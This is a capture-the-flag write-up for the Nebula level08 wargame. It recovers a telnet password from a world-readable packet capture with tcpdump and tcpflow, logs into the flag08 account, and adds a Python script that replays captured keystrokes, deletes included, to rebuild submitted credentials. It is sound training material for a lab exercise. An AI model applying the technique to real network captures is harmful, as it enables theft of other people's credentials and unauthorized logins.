“World readable files strike again. Check what that user was up to, and use it to log into flag08 account.”
This was the verbiage provided in the About section for level08.
The first step I took was to check the home directory for flag08.
level08@nebula:/home/flag08$ ls -l
total 9
-rw-r--r-- 1 root root 8302 2011-11-20 21:22 capture.pcap
It contained a world-readable capture file, so let's see what "the user was up to." I ran the capture file through tcpdump to search for any credentials:
level08@nebula:/home/flag08$ tcpdump -nnAr capture.pcap | grep -i pass
reading from file capture.pcap, link-type EN10MB (Ethernet)
Password: 
It appears that a password is mentioned in the output. I could move capture.pcap off the system and run it through Wireshark to follow the TCP stream, but decided to stick to the command line.
I used the tool tcpflow to follow the user's activity. In console mode (-C) tcpflow prints both directions of the connection and renders every non-printable byte as a dot, so the telnet option negotiation at the start of the session shows up as mostly dots:
level08@nebula:/home/flag08$ tcpflow -C -r capture.pcap
..%
..%
..&..... ..#..'..$
..&..... ..#..'..$
.. .....#.....'.........
.. .38400,38400....#.SodaCan:0....'..DISPLAY.SodaCan:0......xterm..
........"........!
........"..".....b........b.....B.
..............................1.......!
.."....
.."....
..!..........."
........"
.."................
.....................
Linux 2.6.38-8-generic-pae (::ffff:10.1.1.2) (pts/10)
..wwwbugs login:
l
.l
e
.e
v
.v
e
.e
l
.l
8
.8
.
.
Password:
b
a
c
k
d
o
o
r
.
.
.
0
0
R
m
8
.
a
t
e
.
.
.
Login incorrect
wwwbugs login:
The capture caught the user attempting to log in to wwwbugs over telnet. The login was incorrect, but the password may have been mistyped.
The dots inside the password are the non-printable bytes tcpflow could not render, and here they are delete (0x7f) keystrokes: the three after "backdoor" erase "oor", and the one after "00Rm8" erases the "8", so the string the user actually submitted was "backd00Rmate" rather than "m8." Let's try to log in using "backd00Rmate":
level08@nebula:/home/flag08$ su flag08
Password:
sh-4.2$ id
uid=991(flag08) gid=991(flag08) groups=991(flag08)
sh-4.2$ getflag
You have successfully executed getflag on a target account
Looks like the password I chose was correct. The tricky part of this challenge was finding the "Login incorrect" statement, which steered me away from using other combinations of "backdoor…00Rm8.ate".
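Replaying the keystrokes by hand works for one short password, but the same reasoning can be automated. The script below is an added example and is not part of the original write-up or of tcpflow: it strips telnet option negotiation (the IAC sequences that produced the dots at the top of the tcpflow output), then replays the remaining client-to-server bytes the way a canonical-mode tty would, treating DEL and backspace as erase-one-character, ^U as kill-line and ^W as kill-word. The sample byte string is constructed to mirror the client side of the level08 session, with the dots written out as the DEL bytes they stand for; it is not copied from capture.pcap.

```python
# Added example (not from the original write-up): replay a captured telnet
# keystroke stream to recover what the user actually submitted, line editing
# included. SAMPLE_CLIENT_STREAM is CONSTRUCTED to mirror the client-to-server
# direction of the level08 session; it is not copied from capture.pcap.

IAC, SE, SB = 0xFF, 0xF0, 0xFA
WILL, WONT, DO, DONT = 0xFB, 0xFC, 0xFD, 0xFE


def strip_telnet_negotiation(data: bytes) -> bytes:
    """Drop telnet IAC command and option sequences, keeping application bytes.

    IAC IAC is an escaped literal 0xFF; IAC SB ... IAC SE is a subnegotiation
    (terminal type, window size, DISPLAY); IAC WILL/WONT/DO/DONT <opt> is a
    three-byte option negotiation; any other IAC <cmd> is two bytes.
    """
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if b != IAC:
            out.append(b)
            i += 1
            continue
        if i + 1 >= len(data):          # truncated IAC at end of stream
            break
        cmd = data[i + 1]
        if cmd == IAC:
            out.append(IAC)
            i += 2
        elif cmd == SB:
            end = data.find(bytes([IAC, SE]), i + 2)
            i = len(data) if end < 0 else end + 2
        elif cmd in (WILL, WONT, DO, DONT):
            i += 3
        else:
            i += 2
    return bytes(out)


def apply_line_editing(data: bytes) -> list[str]:
    """Replay keystrokes the way a canonical-mode tty would.

    DEL (0x7f) and BS (0x08) erase one character, ^U (0x15) kills the line,
    ^W (0x17) kills the previous word, CR ends a line; the LF or NUL that
    telnet sends after a CR is ignored.
    """
    lines: list[str] = []
    cur: list[str] = []
    prev = None
    for b in data:
        if b in (0x7F, 0x08):
            if cur:
                cur.pop()
        elif b == 0x15:
            cur.clear()
        elif b == 0x17:
            while cur and cur[-1] == " ":
                cur.pop()
            while cur and cur[-1] != " ":
                cur.pop()
        elif b == 0x0D or (b == 0x0A and prev != 0x0D):
            lines.append("".join(cur))
            cur = []
        elif b in (0x0A, 0x00):
            pass                        # trailing LF/NUL of a CR LF / CR NUL pair
        elif 0x20 <= b < 0x7F:
            cur.append(chr(b))
        # other control bytes (arrow keys and the like) are ignored
        prev = b
    if cur:
        lines.append("".join(cur))
    return lines


def recover_input(client_stream: bytes) -> list[str]:
    """Client-to-server telnet bytes -> the lines the user actually submitted."""
    return apply_line_editing(strip_telnet_negotiation(client_stream))


# Constructed sample: a little option negotiation, then the keystrokes shown
# in the write-up with the '.' bytes written out as DEL (0x7f).
SAMPLE_CLIENT_STREAM = (
    b"\xff\xfd\x03"                      # IAC DO SUPPRESS-GO-AHEAD
    b"\xff\xfb\x18"                      # IAC WILL TERMINAL-TYPE
    b"\xff\xfa\x18\x00xterm\xff\xf0"     # IAC SB TERMINAL-TYPE IS "xterm" IAC SE
    b"level8\r\n"
    b"backdoor\x7f\x7f\x7f00Rm8\x7fate\r\n"
)

if __name__ == "__main__":
    for line in recover_input(SAMPLE_CLIENT_STREAM):
        print(line)
```

Against a real capture, run tcpflow without -C (`tcpflow -r capture.pcap`) so that each direction of the connection is written to its own file, then read the client-to-server file into `recover_input()`; the two recovered lines are the username and the password as the server received them, which is what `su` needs.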